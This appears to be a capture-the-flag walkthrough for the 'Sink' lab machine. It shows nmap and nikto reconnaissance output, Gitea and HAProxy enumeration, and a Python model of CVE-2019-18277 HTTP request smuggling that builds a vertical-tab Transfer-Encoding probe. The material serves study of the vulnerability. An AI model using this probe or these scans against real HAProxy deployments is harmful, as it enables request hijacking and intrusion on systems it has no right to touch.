Sink

$ sudo nmap -p- -T4 -A 10.10.10.225
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=db4459e435edd5b6; Path=/; HttpOnly
|     Set-Cookie: _csrf=_R16T-Xgg2R9zqqAodtLZUaAwyg6MTYyMDg2MzUwNTkwMTgyOTAxNA; Path=/; Expires=Thu, 13 May 2021 23:51:45 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 12 May 2021 23:51:45 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=d82d2cfb01820471; Path=/; HttpOnly
|     Set-Cookie: _csrf=PPTy3qhKB5F45tJFE7maLHJIAq06MTYyMDg2MzUxMTA2MTQxMDgwNQ; Path=/; Expires=Thu, 13 May 2021 23:51:51 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 12 May 2021 23:51:51 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops

$ nikto -h http://10.10.10.225:3000
+ Server: No banner retrieved
+ Cookie lang created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
$ nikto -h http://10.10.10.225:5000
+ Server: gunicorn/20.0.0
+ Retrieved via header: haproxy
+ Retrieved x-served-by header: 3a88a256bfea
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-served-by' found, with contents: 3a88a256bfea
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 7 item(s) reported on remote host

http://10.10.10.225:3000 - Gitea (port 3000 shows as "ppp?" in nmap, but the fingerprint-strings and the page footer give it away)
Footer: Powered by Gitea Version: 1.12.6 Page: 0ms Template: 0ms
Usernames noted on the Gitea instance: root, david, marcus
http://10.10.10.225:3000/api/swagger (Gitea API docs)
http://10.10.10.225:3000/vendor/librejs.html

http://10.10.10.225:5000 - "Sink Devops", Gunicorn 20.0.0 behind HAProxy (nikto: Via: haproxy, X-Served-By: 3a88a256bfea)
Email address seen on the site: admin@sink.htb

$ echo "10.10.10.225 sink.htb" | sudo tee -a /etc/hosts

HAProxy front end + Gunicorn back end on 5000: candidate for CVE-2019-18277, HTTP request smuggling in HAProxy before 2.0.6. HAProxy did not treat a Transfer-Encoding value it could not parse as "chunked" but still forwarded the header, so it sized the request by Content-Length while a lenient back end (Gunicorn here) honoured the chunked encoding: a CL.TE desync.
https://nathandavison.com/blog/haproxy-http-request-smuggling
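To make the CL.TE desync concrete for this stack, here is an added example (written for these notes; not code from the linked post, HAProxy or Gunicorn). It builds the probe request the CVE describes, a Transfer-Encoding header carrying a vertical tab (0x0b) before "chunked", then parses the same byte stream the way each hop would: a strict front end that only treats SP/HTAB as header whitespace and so falls back to Content-Length, and a lenient back end that strips the control character and reads the body as chunked. The exact whitespace rules of each hop are a modelling assumption, the host name and the smuggled path are placeholders, and nothing is sent over the network.

```python
"""
Model of the CL.TE desync behind CVE-2019-18277: a Content-Length-trusting hop
in front of a chunked-trusting hop. Constructed example, no network access.
"""

VT = "\x0b"  # vertical tab: HAProxy < 2.0.6 did not recognise a Transfer-Encoding
             # value containing it as "chunked", yet forwarded the header unchanged


def build_probe(host: str, smuggled: str) -> bytes:
    """Build one CL.TE probe. Content-Length covers the whole body, so a front
    end that honours it forwards everything as a single POST; a back end that
    honours the tainted chunked header stops at the 0-size chunk and treats
    `smuggled` as the start of the next request on the same connection."""
    body = "0\r\n\r\n" + smuggled
    head = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Transfer-Encoding:{VT}chunked\r\n"   # the CVE-2019-18277 trigger
        "\r\n"
    )
    return (head + body).encode("latin-1")


def _parse_head(stream: bytes, pos: int, strip_chars):
    """Return (request_line, headers, body_start), or None if no full head."""
    end = stream.find(b"\r\n\r\n", pos)
    if end < 0:
        return None
    lines = stream[pos:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip(strip_chars)
    return lines[0], headers, end + 4


def _read_chunked(stream: bytes, pos: int):
    """Consume a chunked body; return (decoded_body, position after it)."""
    body = b""
    while True:
        nl = stream.find(b"\r\n", pos)
        if nl < 0:
            raise ValueError("truncated chunk-size line")
        size = int(stream[pos:nl].split(b";")[0], 16)
        pos = nl + 2
        if size == 0:
            return body, pos + 2          # skip the empty trailer CRLF
        body += stream[pos:pos + size]
        pos += size + 2                   # chunk data plus its trailing CRLF


def split_requests(stream: bytes, strip_chars):
    """Split a byte stream into (request_line, body) pairs the way a hop with
    the given header-whitespace rules would see them."""
    reqs, pos = [], 0
    while (parsed := _parse_head(stream, pos, strip_chars)) is not None:
        line, hdrs, pos = parsed
        if hdrs.get("transfer-encoding") == "chunked":
            body, pos = _read_chunked(stream, pos)
        else:
            n = int(hdrs.get("content-length", "0"))
            body, pos = stream[pos:pos + n], pos + n
        reqs.append((line, body))
    return reqs


def front_end_view(stream: bytes):
    """Modelled strict hop (HAProxy): only SP/HTAB are header whitespace, so
    "\x0bchunked" is not "chunked" and Content-Length decides the body size."""
    return split_requests(stream, " \t")


def back_end_view(stream: bytes):
    """Modelled lenient hop (Gunicorn): str.strip() treats VT as whitespace,
    so the same header reads as "chunked" and the body ends at the 0 chunk."""
    return split_requests(stream, None)


if __name__ == "__main__":
    probe = build_probe("sink.htb", "GET /notes HTTP/1.1\r\nHost: sink.htb\r\n\r\n")
    print("front end sees", [r[0] for r in front_end_view(probe)])
    print("back end sees ", [r[0] for r in back_end_view(probe)])
```

The front end forwards one POST whose body happens to contain a second request; the back end parses that body as an empty chunked stream followed by a fresh GET. In the real attack the smuggled part is left incomplete so that the next client's request on the reused back-end connection is glued onto it, which is what the write-up above uses. A patched HAProxy rejects the malformed Transfer-Encoding outright, so the two views agree and the probe returns 400 at the edge.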
